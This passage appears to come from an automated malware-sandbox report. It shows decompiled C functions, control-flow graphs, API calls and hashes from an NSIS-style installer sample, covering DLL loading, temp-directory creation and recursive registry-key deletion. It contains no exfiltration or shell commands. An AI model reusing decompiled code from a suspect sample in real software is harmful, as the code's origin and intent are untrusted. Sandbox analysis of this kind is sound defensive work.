                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                                                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll
                                                                                                                                                                                                                            • API String ID: 1495540970-831635876
                                                                                                                                                                                                                            • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                                                                                                                                                            • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 813 4069c5-4069e5 GetSystemDirectoryW 814 4069e7 813->814 815 4069e9-4069eb 813->815 814->815 816 4069fc-4069fe 815->816 817 4069ed-4069f6 815->817 819 4069ff-406a32 wsprintfW LoadLibraryExW 816->819 817->816 818 4069f8-4069fa 817->818 818->819
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                                                                                                                                                            0x004069dc
                                                                                                                                                                                                                            0x004069e5
                                                                                                                                                                                                                            0x004069e7
                                                                                                                                                                                                                            0x004069e7
                                                                                                                                                                                                                            0x004069eb
                                                                                                                                                                                                                            0x004069fe
                                                                                                                                                                                                                            0x004069f8
                                                                                                                                                                                                                            0x004069f8
                                                                                                                                                                                                                            0x004069f8
                                                                                                                                                                                                                            0x00406a17
                                                                                                                                                                                                                            0x00406a2b
                                                                                                                                                                                                                            0x00406a32

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00406A17
                                                                                                                                                                                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                            • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                                                                                                                                                            • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 820 405b99-405be4 CreateDirectoryW 821 405be6-405be8 820->821 822 405bea-405bf7 GetLastError 820->822 823 405c11-405c13 821->823 822->823 824 405bf9-405c0d SetFileSecurityW 822->824 824->821 825 405c0f GetLastError 824->825 825->823
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                                                                                                                                            0x00405ba4
                                                                                                                                                                                                                            0x00405ba8
                                                                                                                                                                                                                            0x00405bab
                                                                                                                                                                                                                            0x00405bb1
                                                                                                                                                                                                                            0x00405bb5
                                                                                                                                                                                                                            0x00405bb9
                                                                                                                                                                                                                            0x00405bc1
                                                                                                                                                                                                                            0x00405bc8
                                                                                                                                                                                                                            0x00405bce
                                                                                                                                                                                                                            0x00405bd5
                                                                                                                                                                                                                            0x00405bdc
                                                                                                                                                                                                                            0x00405be4
                                                                                                                                                                                                                            0x00405be6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405be6
                                                                                                                                                                                                                            0x00405bf0
                                                                                                                                                                                                                            0x00405bf7
                                                                                                                                                                                                                            0x00405c0d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405c0f
                                                                                                                                                                                                                            0x00405c13

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405BF0
                                                                                                                                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405C0F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                            • API String ID: 3449924974-3916508600
                                                                                                                                                                                                                            • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                                                                                                                                                            • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 826 402ea9-402ed2 call 4064d5 828 402ed7-402edb 826->828 829 402ee1-402ee5 828->829 830 402f8c-402f90 828->830 831 402ee7-402f08 RegEnumValueW 829->831 832 402f0a-402f1d 829->832 831->832 833 402f71-402f7f RegCloseKey 831->833 834 402f46-402f4d RegEnumKeyW 832->834 833->830 835 402f1f-402f21 834->835 836 402f4f-402f61 RegCloseKey call 406a35 834->836 835->833 838 402f23-402f37 call 402ea9 835->838 842 402f81-402f87 836->842 843 402f63-402f6f RegDeleteKeyW 836->843 838->836 844 402f39-402f45 838->844 842->830 843->830 844->834
                                                                                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                                                                                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                                                                                                                                                            0x00402eb4
                                                                                                                                                                                                                            0x00402ebd
                                                                                                                                                                                                                            0x00402ec6
                                                                                                                                                                                                                            0x00402ed2
                                                                                                                                                                                                                            0x00402edb
                                                                                                                                                                                                                            0x00402ee5
                                                                                                                                                                                                                            0x00402f0a
                                                                                                                                                                                                                            0x00402f10
                                                                                                                                                                                                                            0x00402f15
                                                                                                                                                                                                                            0x00402f16
                                                                                                                                                                                                                            0x00402f46
                                                                                                                                                                                                                            0x00402f1f
                                                                                                                                                                                                                            0x00402f21
                                                                                                                                                                                                                            0x00402f71
                                                                                                                                                                                                                            0x00402f74
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f7a
                                                                                                                                                                                                                            0x00402f30
                                                                                                                                                                                                                            0x00402f35
                                                                                                                                                                                                                            0x00402f37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f3f
                                                                                                                                                                                                                            0x00402f44
                                                                                                                                                                                                                            0x00402f45
                                                                                                                                                                                                                            0x00402f45
                                                                                                                                                                                                                            0x00402f52
                                                                                                                                                                                                                            0x00402f5a
                                                                                                                                                                                                                            0x00402f61
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f8a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f69
                                                                                                                                                                                                                            0x00402ef5
                                                                                                                                                                                                                            0x00402f08
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f08
                                                                                                                                                                                                                            0x00402f90

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1354259210-0
                                                                                                                                                                                                                            • Opcode ID: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                                                                                                                                                                                            • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 687E1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 845 687e1817-687e1856 call 687e1bff 849 687e185c-687e1860 845->849 850 687e1976-687e1978 845->850 851 687e1869-687e1876 call 687e2480 849->851 852 687e1862-687e1868 call 687e243e 849->852 857 687e1878-687e187d 851->857 858 687e18a6-687e18ad 851->858 852->851 861 687e187f-687e1880 857->861 862 687e1898-687e189b 857->862 859 687e18af-687e18cb call 687e2655 call 687e1654 call 687e1312 GlobalFree 858->859 860 687e18cd-687e18d1 858->860 884 687e1925-687e1929 859->884 867 687e191e-687e1924 call 687e2655 860->867 868 687e18d3-687e191c call 687e1666 call 687e2655 860->868 865 687e1888-687e1889 call 687e2b98 861->865 866 687e1882-687e1883 861->866 862->858 863 687e189d-687e189e call 687e2e23 862->863 877 687e18a3 863->877 880 687e188e 865->880 872 687e1885-687e1886 866->872 873 687e1890-687e1896 call 687e2810 866->873 867->884 868->884 872->858 872->865 883 687e18a5 873->883 877->883 880->877 883->858 888 687e192b-687e1939 call 687e2618 884->888 889 687e1966-687e196d 884->889 895 687e193b-687e193e 888->895 896 687e1951-687e1958 888->896 889->850 891 687e196f-687e1970 GlobalFree 889->891 891->850 895->896 897 687e1940-687e1948 895->897 896->889 898 687e195a-687e1965 call 687e15dd 896->898 897->896 899 687e194a-687e194b FreeLibrary 897->899 898->889 899->896
                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                            			E687E1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x687e506c = _a8;
				 *0x687e5070 = _a16;
				 *0x687e5074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x687e5048, E687E1651);
				_push(1); // executed
				_t37 = E687E1BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E687E243E(_t54);
					}
					_push(_t54);
					E687E2480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E687E2655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E687E1666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E687E2655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E687E2655();
							_t37 = GlobalFree(E687E1312(E687E1654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E687E2618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E687E15DD( *0x687e5068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E687E2E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E687E2B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E687E2810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                                                                                                                                                            0x687e1817
                                                                                                                                                                                                                            0x687e1817
                                                                                                                                                                                                                            0x687e1817
                                                                                                                                                                                                                            0x687e1824
                                                                                                                                                                                                                            0x687e182c
                                                                                                                                                                                                                            0x687e1839
                                                                                                                                                                                                                            0x687e1847
                                                                                                                                                                                                                            0x687e184a
                                                                                                                                                                                                                            0x687e184c
                                                                                                                                                                                                                            0x687e1851
                                                                                                                                                                                                                            0x687e1856
                                                                                                                                                                                                                            0x687e1978
                                                                                                                                                                                                                            0x687e1978
                                                                                                                                                                                                                            0x687e185c
                                                                                                                                                                                                                            0x687e1860
                                                                                                                                                                                                                            0x687e1863
                                                                                                                                                                                                                            0x687e1868
                                                                                                                                                                                                                            0x687e1869
                                                                                                                                                                                                                            0x687e186a
                                                                                                                                                                                                                            0x687e1870
                                                                                                                                                                                                                            0x687e1876
                                                                                                                                                                                                                            0x687e18a6
                                                                                                                                                                                                                            0x687e18ad
                                                                                                                                                                                                                            0x687e18d1
                                                                                                                                                                                                                            0x687e191e
                                                                                                                                                                                                                            0x687e191f
                                                                                                                                                                                                                            0x687e18d3
                                                                                                                                                                                                                            0x687e18d3
                                                                                                                                                                                                                            0x687e18d4
                                                                                                                                                                                                                            0x687e18dd
                                                                                                                                                                                                                            0x687e18de
                                                                                                                                                                                                                            0x687e18e8
                                                                                                                                                                                                                            0x687e18eb
                                                                                                                                                                                                                            0x687e18f0
                                                                                                                                                                                                                            0x687e18f7
                                                                                                                                                                                                                            0x687e18f7
                                                                                                                                                                                                                            0x687e18fd
                                                                                                                                                                                                                            0x687e18fe
                                                                                                                                                                                                                            0x687e1904
                                                                                                                                                                                                                            0x687e190a
                                                                                                                                                                                                                            0x687e1917
                                                                                                                                                                                                                            0x687e1918
                                                                                                                                                                                                                            0x687e191b
                                                                                                                                                                                                                            0x687e18af
                                                                                                                                                                                                                            0x687e18af
                                                                                                                                                                                                                            0x687e18b0
                                                                                                                                                                                                                            0x687e18c5
                                                                                                                                                                                                                            0x687e18c5
                                                                                                                                                                                                                            0x687e1929
                                                                                                                                                                                                                            0x687e192c
                                                                                                                                                                                                                            0x687e1939
                                                                                                                                                                                                                            0x687e1940
                                                                                                                                                                                                                            0x687e1948
                                                                                                                                                                                                                            0x687e194b
                                                                                                                                                                                                                            0x687e194b
                                                                                                                                                                                                                            0x687e1948
                                                                                                                                                                                                                            0x687e1958
                                                                                                                                                                                                                            0x687e1960
                                                                                                                                                                                                                            0x687e1965
                                                                                                                                                                                                                            0x687e1958
                                                                                                                                                                                                                            0x687e196d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e196f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1970
                                                                                                                                                                                                                            0x687e196d
                                                                                                                                                                                                                            0x687e187a
                                                                                                                                                                                                                            0x687e187d
                                                                                                                                                                                                                            0x687e189b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e189e
                                                                                                                                                                                                                            0x687e18a3
                                                                                                                                                                                                                            0x687e18a3
                                                                                                                                                                                                                            0x687e18a5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e18a5
                                                                                                                                                                                                                            0x687e187f
                                                                                                                                                                                                                            0x687e1880
                                                                                                                                                                                                                            0x687e1888
                                                                                                                                                                                                                            0x687e1889
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1889
                                                                                                                                                                                                                            0x687e1882
                                                                                                                                                                                                                            0x687e1883
                                                                                                                                                                                                                            0x687e1891
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1891
                                                                                                                                                                                                                            0x687e1886
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x687e1886

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 687E1BFF: GlobalFree.KERNEL32 ref: 687E1E74
                                                                                                                                                                                                                              • Part of subcall function 687E1BFF: GlobalFree.KERNEL32 ref: 687E1E79
                                                                                                                                                                                                                              • Part of subcall function 687E1BFF: GlobalFree.KERNEL32 ref: 687E1E7E
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E18C5
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 687E194B
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 687E1970
                                                                                                                                                                                                                              • Part of subcall function 687E243E: GlobalAlloc.KERNEL32(00000040,?), ref: 687E246F
                                                                                                                                                                                                                              • Part of subcall function 687E2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,687E1896,00000000), ref: 687E28E0
                                                                                                                                                                                                                              • Part of subcall function 687E1666: wsprintfW.USER32 ref: 687E1694
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.533272603.00000000687E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 687E0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533258912.00000000687E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533285337.00000000687E4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.533299887.00000000687E6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_687e0000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3962662361-3916222277
                                                                                                                                                                                                                            • Opcode ID: 6333e8771f1299a7b59ce7343f6a9f0b2d1326b9bcb7559b964722a562e2762d
                                                                                                                                                                                                                            • Instruction ID: 807b79326056146109be2af6f20e712e927a06670ec9b3270da23621e865cb2d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6333e8771f1299a7b59ce7343f6a9f0b2d1326b9bcb7559b964722a562e2762d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA41E475900245DBDF109F34DACEBA937A8BF0A32AF844575F9389A086DBB4C184C770
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 902 401c43-401c63 call 402d84 * 2 907 401c65-401c6c call 402da6 902->907 908 401c6f-401c73 902->908 907->908 910 401c75-401c7c call 402da6 908->910 911 401c7f-401c85 908->911 910->911 912 401cd3-401cfd call 402da6 * 2 FindWindowExW 911->912 913 401c87-401ca3 call 402d84 * 2 911->913 927 401d03 912->927 925 401cc3-401cd1 SendMessageW 913->925 926 401ca5-401cc1 SendMessageTimeoutW 913->926 925->927 928 401d06-401d09 926->928 927->928 929 402c2a-402c39 928->929 930 401d0f 928->930 930->929
                                                                                                                                                                                                                            C-Code - Quality: 59%
                                                                                                                                                                                                                            			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
